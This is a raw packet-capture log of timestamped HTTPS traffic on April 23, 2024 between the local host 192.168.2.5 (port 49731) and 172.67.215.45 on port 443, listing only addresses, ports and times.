Apr 23, 2024 07:53:29.203252077 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.203284025 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.204611063 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.204629898 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.204669952 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.204678059 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.204710007 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.206171989 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.206188917 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.206231117 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.206238985 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.206270933 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.207251072 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.207283020 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.207308054 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.207314014 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.207334995 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.207355022 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.208794117 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.208810091 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.208848000 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.208853960 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.208878040 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.208895922 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.210568905 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.210585117 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.210628033 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.210634947 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.210666895 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.211839914 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.211857080 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.211896896 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.211903095 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.211921930 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.211940050 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.213418961 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.213435888 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.213476896 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.213484049 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.213515997 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.215404034 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.215420961 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.215456963 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.215464115 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.215481043 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.215504885 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.217753887 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.217770100 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.217806101 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.217813969 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.217849016 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.217859983 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.220032930 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.220065117 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.220093012 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.220103979 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.220114946 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.220139980 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.221518040 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.221534014 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.221575975 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.221582890 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.221616983 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.222731113 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.222748041 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.222789049 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.222795963 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.222826004 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.223802090 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.223818064 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.223858118 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.223864079 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.223881006 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.223897934 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.224761963 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.224781036 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.224828005 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.224836111 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.224873066 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.226414919 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.226454973 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.226469994 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.226478100 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.226500034 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.226520061 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.228387117 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.228404999 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.228446007 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.228470087 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.228507042 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.229170084 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.229187012 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.229221106 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.229228020 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.229259014 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.230277061 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.230294943 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.230334997 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.230343103 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.230371952 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.230962992 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.230978012 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.231020927 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.231029034 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.231060982 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.232119083 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.232134104 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.232181072 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.232188940 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.232219934 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.233562946 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.233580112 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.233625889 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.233633041 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.233664989 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.235006094 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.235022068 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.235081911 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.235090017 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.235120058 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.236076117 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.236092091 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.236134052 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.236141920 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.236174107 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.237549067 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.237565994 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.237623930 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.237633944 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.237665892 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.239000082 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.239017010 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.239068985 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.239077091 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.239109993 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.240216970 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.240233898 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.240283012 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.240291119 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.240324974 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.242005110 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.242022991 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.242091894 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.242100954 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.242129087 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.243273973 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.243290901 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.243344069 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.243351936 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.243380070 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.244609118 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.244626999 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.244663954 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.244672060 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.244688988 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.244709969 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.245785952 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.245803118 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.245851040 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.245857954 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.245897055 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.247446060 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.247462034 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.247518063 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.247525930 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.247560024 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.248636961 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.248652935 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.248701096 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.248708963 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.248739958 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.250165939 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.250183105 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.250228882 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.250236034 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.250268936 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.251430988 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.251446962 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.251492977 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.251501083 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.251518965 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.251538038 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.252942085 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.252962112 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.253005981 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.253012896 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.253040075 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.254586935 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.254614115 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.254645109 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.254652023 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.254674911 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.254693985 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.255601883 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.255619049 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.255664110 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.255670071 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.255702019 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.257229090 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.257246017 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.257307053 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.257314920 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.257347107 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.258397102 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.258414030 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.258455992 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.258464098 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.258495092 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.266696930 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.266715050 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.266792059 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.266801119 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.266838074 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.268929958 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.268948078 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.269002914 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.269011021 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.269045115 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.270555019 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.270571947 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.270613909 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.270621061 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.270652056 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.271449089 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.271470070 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.271514893 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.271522045 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.271553993 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.273196936 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.273212910 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.273248911 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.273257971 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.273277998 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.273298979 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.275717974 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.275733948 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.275784016 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.275789976 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.275820971 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.277826071 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.277847052 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.277888060 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.277894974 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.277925968 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.279022932 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.279042006 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.279076099 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.279082060 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.279102087 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.279120922 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.280700922 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.280715942 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.280765057 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.280771971 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.280803919 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.283055067 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.283071995 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.283128023 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.283139944 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.283174038 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.284694910 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.284710884 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.284748077 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.284754038 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.284778118 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.284792900 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.285805941 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.285821915 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.285866022 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.285872936 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.285907030 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.286999941 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.287034988 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.287059069 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.287070990 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.287082911 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.287101030 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.288633108 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.288650990 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.288693905 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.288700104 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.288732052 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.290074110 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.290090084 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.290132999 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.290139914 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.290167093 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.292253971 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.292274952 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.292308092 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.292313099 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.292334080 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.292354107 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.294245005 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.294264078 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.294301033 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.294306993 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.294326067 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.294342995 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.295418024 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.295433998 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.295475960 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.295483112 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.295499086 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.295521975 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.296901941 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.296919107 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.296962976 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.296969891 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.297003031 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.298528910 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.298544884 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.298578024 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.298587084 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.298607111 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.298625946 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.300024986 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.300040960 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.300080061 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.300087929 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.300118923 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.301198006 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.301215887 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.301280022 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.301290035 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.301307917 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.301326990 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.302267075 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.302283049 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.302339077 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.302346945 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.302388906 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.303499937 CEST	443	49731	172.67.215.45	192.168.2.5
